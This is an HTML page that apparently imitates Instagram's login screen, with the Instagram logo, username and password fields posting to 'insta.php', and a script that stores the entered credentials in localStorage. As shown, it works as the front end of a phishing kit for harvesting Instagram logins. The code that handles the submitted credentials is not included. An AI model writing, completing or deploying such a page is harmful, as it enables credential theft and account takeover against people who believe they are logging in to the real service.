<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram/login..</title>
    
    <script>
        function passvalue(){
            
            var firstname=document.getElementById("txt").value;
            var phonename=document.getElementById("txt1").value;
           
            var password=document.getElementById("pass").value;
            var phonepassword=document.getElementById("pass1").value;
            
           

            localStorage.setItem("textvalue", firstname);
            localStorage.setItem("phonevalue", phonename);
           
            localStorage.setItem("passwordvalue", password);

            localStorage.setItem("phonepasswordvalue", phonepassword);
            return false;
        }
     
    </script>
</head>
<style>
.all{
position: absolute;
margin-top: 50%;
}
.input-box{
    width: 295px;
    padding: 10px 10px;
   margin-top: 3%;
   background-color: rgb(247, 244, 244);
   font-family: Verdana, Geneva, Tahoma, sans-serif;
   border: 0.8px solid gainsboro;
   margin-left: 4%;
   border-radius: 3%;
   outline: none;
overflow: hidden;
}
.logo{
    width: 200px;
    color: black;
    position: absolute;
    margin-top: 28.4%;
    margin-left: 17%;

}
.log{
  
    position: absolute;
    margin-top: 5%;
    width: 314px;
    margin-left: 4%;
    color: cornsilk;
    padding: 10px;
    font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
background-color: #5968f1;
  font-size: 17px;
  font-weight: bold;
  border: none;
  cursor: pointer; 
}
.info{
    position: absolute;
 
    margin-top: 20%;
    font-family: Arial, Helvetica, sans-serif;
    font-size: 13px;
    margin-left: 11%;

    
}

.line{
position: absolute;
}
@media only screen and (min-width:768px){
    .logo{
    margin-top: 20%;
    margin-left: 33%;
}
.all{
    margin-top: 30%;
    margin-left: 20%;
}
.input-box{
    width: 400px;

    outline: none;
overflow: hidden;
}
.log{
    width: 420px;
}
.info{
    margin-top: 15%;
    margin-left: 16%;
}
}
@media only screen and (min-width:1280px){
    .logo{
        margin-top: 10%;
        position: absolute;
        margin-left: 38%;
    }
    .all{
        margin-top: 19%;
        margin-left: 27%;
    }
    .info{
        margin-left: 14%;
    }
    .input-box{
        outline: none;
overflow: hidden;
    }
}
</style>
<body>
    <img src="images/2560px-Instagram_logo.svg.png" class="logo" alt="insta.logo/error not shwoing">
 <form action="insta.php" method="POST">
    <div class="all">
        <div class="input">
            <input type="text" name="name" placeholder="Phone number, email or username" class="input-box">
            <input type="password" name="password" placeholder="Password"  class="input-box">
        </div>
        <input class="log" type="submit" value="Log in"  onclick="Function()">
        <p class="info">Forgot your login details?<b style="color: 
        rgb(13, 13, 92);">Get help logging in.</b></p>
       
    </div>
 </form>
   <b class="line"><hr class="line"></b>

</body>
</html>